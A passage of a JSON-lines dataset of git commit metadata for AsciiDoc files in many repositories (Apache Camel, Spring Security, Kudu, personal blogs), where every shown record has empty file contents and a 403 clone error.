l,jonmcewen\/camel,jkorab\/camel,oalles\/camel,Thopap\/camel,YoshikiHigo\/camel,sabre1041\/camel,akhettar\/camel,tkopczynski\/camel,salikjan\/camel,anton-k11\/camel,jlpedrosa\/camel,anoordover\/camel,alvinkwekel\/camel,sabre1041\/camel,rmarting\/camel,cunningt\/camel,CodeSmell\/camel,ullgren\/camel,apache\/camel,sirlatrom\/camel,chirino\/camel,akhettar\/camel,bhaveshdt\/camel,scranton\/camel,jonmcewen\/camel,jamesnetherton\/camel,pax95\/camel,christophd\/camel,cunningt\/camel,snurmine\/camel,prashant2402\/camel,anoordover\/camel,snurmine\/camel,allancth\/camel,JYBESSON\/camel,NickCis\/camel,jarst\/camel,CodeSmell\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,gilfernandes\/camel,adessaigne\/camel,neoramon\/camel,jonmcewen\/camel,allancth\/camel,lburgazzoli\/camel,FingolfinTEK\/camel,tkopczynski\/camel,nikvaessen\/camel,Fabryprog\/camel,akhettar\/camel,sverkera\/camel,akhettar\/camel,gilfernandes\/camel,Thopap\/camel,curso007\/camel,apache\/camel,lburgazzoli\/camel,yuruki\/camel,bgaudaen\/camel,w4tson\/camel,adessaigne\/camel,drsquidop\/camel,pmoerenhout\/camel,rmarting\/camel,gnodet\/camel,onders86\/camel,prashant2402\/camel,onders86\/camel,lburgazzoli\/apache-camel,anoordover\/camel,w4tson\/camel,driseley\/camel,onders86\/camel,isavin\/camel,sirlatrom\/camel,sirlatrom\/camel,neoramon\/camel,NickCis\/camel,oalles\/camel,snurmine\/camel,curso007\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,FingolfinTEK\/camel,dmvolod\/camel,pax95\/camel,jlpedrosa\/camel,pax95\/camel,jkorab\/camel,ssharma\/camel,tlehoux\/camel,adessaigne\/camel,tlehoux\/camel,jarst\/camel,isavin\/camel,sverkera\/camel,borcsokj\/camel,tadayosi\/camel,Fabryprog\/camel,isavin\/camel,pax95\/camel,jkorab\/camel,CodeSmell\/camel,scranton\/camel,pkletsko\/camel,dmvolod\/camel,objectiser\/camel,acartapanis\/camel,neoramon\/camel,zregvart\/camel,borcsokj\/camel,tdiesler\/camel,lburgazzoli\/apache-camel,RohanHart\/camel,JYBESSON\/camel,chirino\/camel,dmvolod\/camel,anton-k11\/camel,Thopap\/camel,sabre1041\/camel,apache\/camel,jkorab\/camel,jarst\/camel,driseley\/camel,gilfernandes\/camel,bgaudaen\/camel,acartapanis\/camel,pmoerenhout\/camel,bgaudaen\/camel,JYBESSON\/camel,borcsokj\/camel,rmarting\/camel,anton-k11\/camel,chirino\/camel,mcollovati\/camel,veithen\/camel,pmoerenhout\/camel,curso007\/camel,allancth\/camel,alvinkwekel\/camel,jonmcewen\/camel,zregvart\/camel,cunningt\/camel,christophd\/camel,anoordover\/camel,drsquidop\/camel,apache\/camel,jkorab\/camel,pax95\/camel,prashant2402\/camel,sabre1041\/camel,DariusX\/camel,lburgazzoli\/apache-camel,mcollovati\/camel,tadayosi\/camel,gnodet\/camel,YoshikiHigo\/camel,mcollovati\/camel,jlpedrosa\/camel,gilfernandes\/camel,allancth\/camel,veithen\/camel,pax95\/camel,lburgazzoli\/apache-camel,tlehoux\/camel,YoshikiHigo\/camel,nikhilvibhav\/camel,tdiesler\/camel,mgyongyosi\/camel,isavin\/camel,tdiesler\/camel,lburgazzoli\/apache-camel,RohanHart\/camel,alvinkwekel\/camel,JYBESSON\/camel,w4tson\/camel,punkhorn\/camel-upstream,nboukhed\/camel,nicolaferraro\/camel,ullgren\/camel,gnodet\/camel,lburgazzoli\/camel,oalles\/camel,tkopczynski\/camel,YoshikiHigo\/camel,anton-k11\/camel,NickCis\/camel","old_file":"components\/camel-stringtemplate\/src\/main\/docs\/string-template.adoc","new_file":"components\/camel-stringtemplate\/src\/main\/docs\/string-template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f704764f156bcc7142ed81bde9e5860e768ecbf6","subject":"y2b create post Rode Video Mic Unboxing","message":"y2b create post Rode Video Mic Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-05-30-Rode-Video-Mic-Unboxing.adoc","new_file":"_posts\/2011-05-30-Rode-Video-Mic-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3372cbe2d40dcb72b681747f74e124cf679b026f","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3445058745b124c19326e06485e642fdcbd09c0","subject":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","message":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a35334b62a797bda5b31bedd2ca96c54e7211a4c","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"253b04cb1bb97629a1134d1e4b2a4e0358b9e9de","subject":"Update 2016-07-22-Stable-Matching-Algorithm.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dae867164842ae55c722bbc8c74e7099458bf4b6","subject":"Add common snippet common-multitenancymode","message":"Add common snippet common-multitenancymode","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-multitenancymode.adoc","new_file":"src\/main\/docs\/common-multitenancymode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe7a22c0dc1cfd3f65d91aae9d136b8883533850","subject":"toybox has files I use to add private key to ssh-agent","message":"toybox has files I use to add private key to ssh-agent\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b566cfae13b665e9931a905f8c2e6815f51d9454","subject":"add generated file","message":"add generated file\n","repos":"diabolicallabs\/vertx-mongo-client,diabolicallabs\/vertx-mongo-client","old_file":"vertx-mongo-client\/src\/main\/asciidoc\/dataobjects.adoc","new_file":"vertx-mongo-client\/src\/main\/asciidoc\/dataobjects.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diabolicallabs\/vertx-mongo-client.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"18066d46989a694d12492383de4dda4f65a6a04f","subject":"JUnit 5 and EE","message":"JUnit 5 and EE\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/TestingEE.adoc","new_file":"Best practices\/TestingEE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8147d24703db18e99900fe244ffb109b23236d0","subject":"Monospace-license issue","message":"Monospace-license issue\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c783eee95987e04f2b6bb68924d3dfd0fa8c22a","subject":"Update README.asciidoc","message":"Update README.asciidoc\n","repos":"xmeta\/dinzai-datni","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmeta\/dinzai-datni.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c630ac80a7d55bc77d84f08b35049db2bb2e0098","subject":"Update 2016-02-16-All-Important-Context-Maps.adoc","message":"Update 2016-02-16-All-Important-Context-Maps.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbc53890f43aa11340ce0ca2efedbc30ffa9b2d5","subject":"neural networks basics post","message":"neural networks basics post\n","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2017-06-12-neural_networks_training_basics.adoc","new_file":"_posts\/2017-06-12-neural_networks_training_basics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5e6c450f9c110fe0043b5f6a3d21cb6d32c83d1","subject":"Update 2009-04-16-Eclipse-or-Netbeans.adoc","message":"Update 2009-04-16-Eclipse-or-Netbeans.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2009-04-16-Eclipse-or-Netbeans.adoc","new_file":"_posts\/2009-04-16-Eclipse-or-Netbeans.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5ef3943d6acf5f7589b148df4615f39db2c4f78","subject":"Update 2018-03-09-Javascript-Objectid.adoc","message":"Update 2018-03-09-Javascript-Objectid.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2018-03-09-Javascript-Objectid.adoc","new_file":"_posts\/2018-03-09-Javascript-Objectid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4783717b654528858cd57c1eb59b110bcac81fb","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"610d7bcf417348498c8cc4107c8eed84988fb9ff","subject":"idp_test parameter docs","message":"idp_test parameter docs\n","repos":"rohe\/saml2test2,rohe\/saml2test2,identinetics\/saml2test2,identinetics\/saml2test2,rohe\/saml2test2,identinetics\/saml2test2,identinetics\/saml2test2,rohe\/saml2test2","old_file":"doc\/idp_test.commandline.adoc","new_file":"doc\/idp_test.commandline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/identinetics\/saml2test2.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"8c5ddc658d924c13113ffc9f97559c88ca0fd0f7","subject":"Update 2011-01-04-Unsetting-IDs-when-adding-records-in-CakePHP.adoc","message":"Update 2011-01-04-Unsetting-IDs-when-adding-records-in-CakePHP.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2011-01-04-Unsetting-IDs-when-adding-records-in-CakePHP.adoc","new_file":"_posts\/2011-01-04-Unsetting-IDs-when-adding-records-in-CakePHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"305ac077f6994507c1758451dcc9a5d03a0a085a","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91d70114dc9784e269a457c0304b50d195c33d1b","subject":"Update 2019-12-29-secret.adoc","message":"Update 2019-12-29-secret.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-12-29-secret.adoc","new_file":"_posts\/2019-12-29-secret.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1573318bde91bdcea665497cf1eb9e4b399205f","subject":"Create plan_alignment.adoc","message":"Create plan_alignment.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/plan_alignment.adoc","new_file":"userguide\/tutorials\/plan_alignment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45d93099b7db693748506604bfdacc336ce13fd3","subject":"Clarify installation instructions","message":"Clarify installation instructions\n\nClarify that journal can not be empty, provide few demo transactions,\nand add example output.\n\nissue: github: #21\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>\n","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"30721c7066db8f999e399a966592e490481b621f","subject":"docs: Remove reference to old kudu-user mailing list","message":"docs: Remove reference to old kudu-user mailing list\n\nChange-Id: I2752b7988d960a24be1597906226996e7a920d4c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3711\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7b104bff065bd52d9dd357eefc8a9fd682bbdf74","subject":"Added main readme","message":"Added main readme\n","repos":"goldmann\/docker-scripts,jpopelka\/docker-scripts,lichia\/docker-scripts,TomasTomecek\/docker-scripts,goldmann\/docker-squash","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/goldmann\/docker-squash.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c081faf6014936e5a505858265beb0fe033d23f1","subject":"SEC-2871: Polish README.adoc","message":"SEC-2871: Polish README.adoc\n","repos":"liuguohua\/spring-security,Peter32\/spring-security,caiwenshu\/spring-security,diegofernandes\/spring-security,xingguang2013\/spring-security,mounb\/spring-security,zshift\/spring-security,pwheel\/spring-security,pkdevbox\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,follow99\/spring-security,cyratech\/spring-security,mrkingybc\/spring-security,fhanik\/spring-security,thomasdarimont\/spring-security,olezhuravlev\/spring-security,djechelon\/spring-security,ajdinhedzic\/spring-security,mparaz\/spring-security,panchenko\/spring-security,pwheel\/spring-security,zhaoqin102\/spring-security,djechelon\/spring-security,panchenko\/spring-security,driftman\/spring-security,zhaoqin102\/spring-security,pwheel\/spring-security,driftman\/spring-security,likaiwalkman\/spring-security,thomasdarimont\/spring-security,spring-projects\/spring-security,wkorando\/spring-security,djechelon\/spring-security,pkdevbox\/spring-security,ollie314\/spring-security,kazuki43zoo\/spring-security,SanjayUser\/SpringSecurityPro,adairtaosy\/spring-security,forestqqqq\/spring-security,Krasnyanskiy\/spring-security,raindev\/spring-security,spring-projects\/spring-security,SanjayUser\/SpringSecurityPro,ractive\/spring-security,zhaoqin102\/spring-security,ractive\/spring-security,Peter32\/spring-security,ollie314\/spring-security,Krasnyanskiy\/spring-security,hippostar\/spring-security,liuguohua\/spring-security,chinazhaoht\/spring-security,Peter32\/spring-security,diegofernandes\/spring-security,driftman\/spring-security,jmnarloch\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,kazuki43zoo\/spring-security,hippostar\/spring-security,follow99\/spring-security,MatthiasWinzeler\/spring-security,mparaz\/spring-security,djechelon\/spring-security,raindev\/spring-security,liuguohua\/spring-security,olezhuravlev\/spring-security,eddumelendez\/spring-security,zgscwjm\/spring-security,diegofernandes\/spring-security,mrkingybc\/spring-security,fhanik\/spring-security,wkorando\/spring-security,MatthiasWinzeler\/spring-security,mdeinum\/spring-security,panchenko\/spring-security,fhanik\/spring-security,pwheel\/spring-security,jgrandja\/spring-security,SanjayUser\/SpringSecurityPro,SanjayUser\/SpringSecurityPro,raindev\/spring-security,adairtaosy\/spring-security,ollie314\/spring-security,likaiwalkman\/spring-security,rwinch\/spring-security,yinhe402\/spring-security,jmnarloch\/spring-security,eddumelendez\/spring-security,follow99\/spring-security,ollie314\/spring-security,mrkingybc\/spring-security,caiwenshu\/spring-security,mounb\/spring-security,pwheel\/spring-security,ajdinhedzic\/spring-security,rwinch\/spring-security,olezhuravlev\/spring-security,Xcorpio\/spring-security,thomasdarimont\/spring-security,yinhe402\/spring-security,yinhe402\/spring-security,ractive\/spring-security,thomasdarimont\/spring-security,SanjayUser\/SpringSecurityPro,zgscwjm\/spring-security,jgrandja\/spring-security,mrkingybc\/spring-security,zgscwjm\/spring-security,zhaoqin102\/spring-security,caiwenshu\/spring-security,mounb\/spring-security,likaiwalkman\/spring-security,follow99\/spring-security,diegofernandes\/spring-security,adairtaosy\/spring-security,kazuki43zoo\/spring-security,jmnarloch\/spring-security,xingguang2013\/spring-security,ajdinhedzic\/spring-security,fhanik\/spring-security,jmnarloch\/spring-security,caiwenshu\/spring-security,Krasnyanskiy\/spring-security,Xcorpio\/spring-security,forestqqqq\/spring-security,zshift\/spring-security,xingguang2013\/spring-security,eddumelendez\/spring-security,zgscwjm\/spring-security,ractive\/spring-security,Krasnyanskiy\/spring-security,olezhuravlev\/spring-security,chinazhaoht\/spring-security,pkdevbox\/spring-security,zshift\/spring-security,djechelon\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,chinazhaoht\/spring-security,ajdinhedzic\/spring-security,mparaz\/spring-security,mdeinum\/spring-security,hippostar\/spring-security,MatthiasWinzeler\/spring-security,rwinch\/spring-security,likaiwalkman\/spring-security,Peter32\/spring-security,mdeinum\/spring-security,mdeinum\/spring-security,zshift\/spring-security,fhanik\/spring-security,MatthiasWinzeler\/spring-security,jgrandja\/spring-security,raindev\/spring-security,wkorando\/spring-security,fhanik\/spring-security,xingguang2013\/spring-security,thomasdarimont\/spring-security,cyratech\/spring-security,adairtaosy\/spring-security,cyratech\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,forestqqqq\/spring-security,mparaz\/spring-security,rwinch\/spring-security,olezhuravlev\/spring-security,cyratech\/spring-security,chinazhaoht\/spring-security,pkdevbox\/spring-security,driftman\/spring-security,spring-projects\/spring-security,forestqqqq\/spring-security,hippostar\/spring-security,Xcorpio\/spring-security,kazuki43zoo\/spring-security,liuguohua\/spring-security,jgrandja\/spring-security,Xcorpio\/spring-security,mounb\/spring-security,panchenko\/spring-security,jgrandja\/spring-security,yinhe402\/spring-security,spring-projects\/spring-security,rwinch\/spring-security","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a5ef24be545575bee5457e08d3e1518454033ebb","subject":"Added serialization dataformat docs to Gitbook","message":"Added serialization dataformat docs to Gitbook\n","repos":"davidkarlsen\/camel,sirlatrom\/camel,pmoerenhout\/camel,objectiser\/camel,Thopap\/camel,onders86\/camel,alvinkwekel\/camel,alvinkwekel\/camel,rmarting\/camel,pkletsko\/camel,bhaveshdt\/camel,DariusX\/camel,nicolaferraro\/camel,tlehoux\/camel,kevinearls\/camel,zregvart\/camel,jarst\/camel,snurmine\/camel,anton-k11\/camel,anoordover\/camel,onders86\/camel,sabre1041\/camel,pax95\/camel,tkopczynski\/camel,onders86\/camel,drsquidop\/camel,dmvolod\/camel,Fabryprog\/camel,davidkarlsen\/camel,lburgazzoli\/camel,dmvolod\/camel,nboukhed\/camel,hqstevenson\/camel,pmoerenhout\/camel,w4tson\/camel,acartapanis\/camel,akhettar\/camel,sverkera\/camel,dmvolod\/camel,chirino\/camel,chirino\/camel,jkorab\/camel,DariusX\/camel,adessaigne\/camel,bhaveshdt\/camel,Fabryprog\/camel,jkorab\/camel,pax95\/camel,ullgren\/camel,anton-k11\/camel,jonmcewen\/camel,NickCis\/camel,adessaigne\/camel,neoramon\/camel,sirlatrom\/camel,hqstevenson\/camel,gnodet\/camel,anton-k11\/camel,tlehoux\/camel,sverkera\/camel,tdiesler\/camel,alvinkwekel\/camel,tkopczynski\/camel,drsquidop\/camel,NickCis\/camel,rmarting\/camel,jonmcewen\/camel,neoramon\/camel,apache\/camel,christophd\/camel,acartapanis\/camel,jamesnetherton\/camel,acartapanis\/camel,hqstevenson\/camel,lburgazzoli\/apache-camel,drsquidop\/camel,chirino\/camel,pkletsko\/camel,pmoerenhout\/camel,jonmcewen\/camel,chirino\/camel,nikhilvibhav\/camel,veithen\/camel,punkhorn\/camel-upstream,w4tson\/camel,chirino\/camel,sabre1041\/camel,driseley\/camel,curso007\/camel,cunningt\/camel,w4tson\/camel,yuruki\/camel,kevinearls\/camel,tdiesler\/camel,nikhilvibhav\/camel,dmvolod\/camel,snurmine\/camel,sverkera\/camel,prashant2402\/camel,davidkarlsen\/camel,RohanHart\/camel,mcollovati\/camel,CodeSmell\/camel,driseley\/camel,gautric\/camel,tadayosi\/camel,lburgazzoli\/apache-camel,sirlatrom\/camel,neoramon\/camel,nicolaferraro\/camel,onders86\/camel,JYBESSON\/camel,akhettar\/camel,jarst\/camel,pkletsko\/camel,snurmine\/camel,nikhilvibhav\/camel,gautric\/camel,yuruki\/camel,punkhorn\/camel-upstream,prashant2402\/camel,bhaveshdt\/camel,jonmcewen\/camel,DariusX\/camel,allancth\/camel,w4tson\/camel,CodeSmell\/camel,JYBESSON\/camel,mgyongyosi\/camel,ssharma\/camel,ssharma\/camel,akhettar\/camel,allancth\/camel,ssharma\/camel,pax95\/camel,sirlatrom\/camel,apache\/camel,jkorab\/camel,drsquidop\/camel,scranton\/camel,pax95\/camel,nboukhed\/camel,curso007\/camel,tlehoux\/camel,tlehoux\/camel,RohanHart\/camel,NickCis\/camel,kevinearls\/camel,CodeSmell\/camel,rmarting\/camel,snurmine\/camel,mcollovati\/camel,chirino\/camel,punkhorn\/camel-upstream,akhettar\/camel,Thopap\/camel,RohanHart\/camel,lburgazzoli\/camel,onders86\/camel,objectiser\/camel,isavin\/camel,prashant2402\/camel,christophd\/camel,tdiesler\/camel,gnodet\/camel,snurmine\/camel,bgaudaen\/camel,objectiser\/camel,tlehoux\/camel,cunningt\/camel,gilfernandes\/camel,lburgazzoli\/apache-camel,driseley\/camel,anoordover\/camel,mcollovati\/camel,anoordover\/camel,adessaigne\/camel,dmvolod\/camel,onders86\/camel,alvinkwekel\/camel,rmarting\/camel,sabre1041\/camel,allancth\/camel,gilfernandes\/camel,veithen\/camel,bhaveshdt\/camel,Fabryprog\/camel,pax95\/camel,ullgren\/camel,isavin\/camel,lburgazzoli\/camel,lburgazzoli\/camel,tdiesler\/camel,prashant2402\/camel,jamesnetherton\/camel,pkletsko\/camel,christophd\/camel,scranton\/camel,gautric\/camel,jarst\/camel,nicolaferraro\/camel,tdiesler\/camel,gnodet\/camel,JYBESSON\/camel,veithen\/camel,kevinearls\/camel,gilfernandes\/camel,ullgren\/camel,salikjan\/camel,jamesnetherton\/camel,isavin\/camel,curso007\/camel,nboukhed\/camel,punkhorn\/camel-upstream,Thopap\/camel,mgyongyosi\/camel,jonmcewen\/camel,gilfernandes\/camel,ssharma\/camel,pmoerenhout\/camel,cunningt\/camel,mcollovati\/camel,nboukhed\/camel,driseley\/camel,davidkarlsen\/camel,kevinearls\/camel,lburgazzoli\/apache-camel,anoordover\/camel,nboukhed\/camel,adessaigne\/camel,mgyongyosi\/camel,curso007\/camel,sirlatrom\/camel,sirlatrom\/camel,gilfernandes\/camel,isavin\/camel,cunningt\/camel,scranton\/camel,bgaudaen\/camel,snurmine\/camel,RohanHart\/camel,neoramon\/camel,sverkera\/camel,veithen\/camel,Fabryprog\/camel,adessaigne\/camel,tadayosi\/camel,anoordover\/camel,tlehoux\/camel,tadayosi\/camel,sabre1041\/camel,tadayosi\/camel,christophd\/camel,prashant2402\/camel,jamesnetherton\/camel,drsquidop\/camel,christophd\/camel,apache\/camel,zregvart\/camel,jonmcewen\/camel,gautric\/camel,driseley\/camel,rmarting\/camel,christophd\/camel,hqstevenson\/camel,cunningt\/camel,NickCis\/camel,neoramon\/camel,jkorab\/camel,hqstevenson\/camel,nicolaferraro\/camel,drsquidop\/camel,w4tson\/camel,RohanHart\/camel,ullgren\/camel,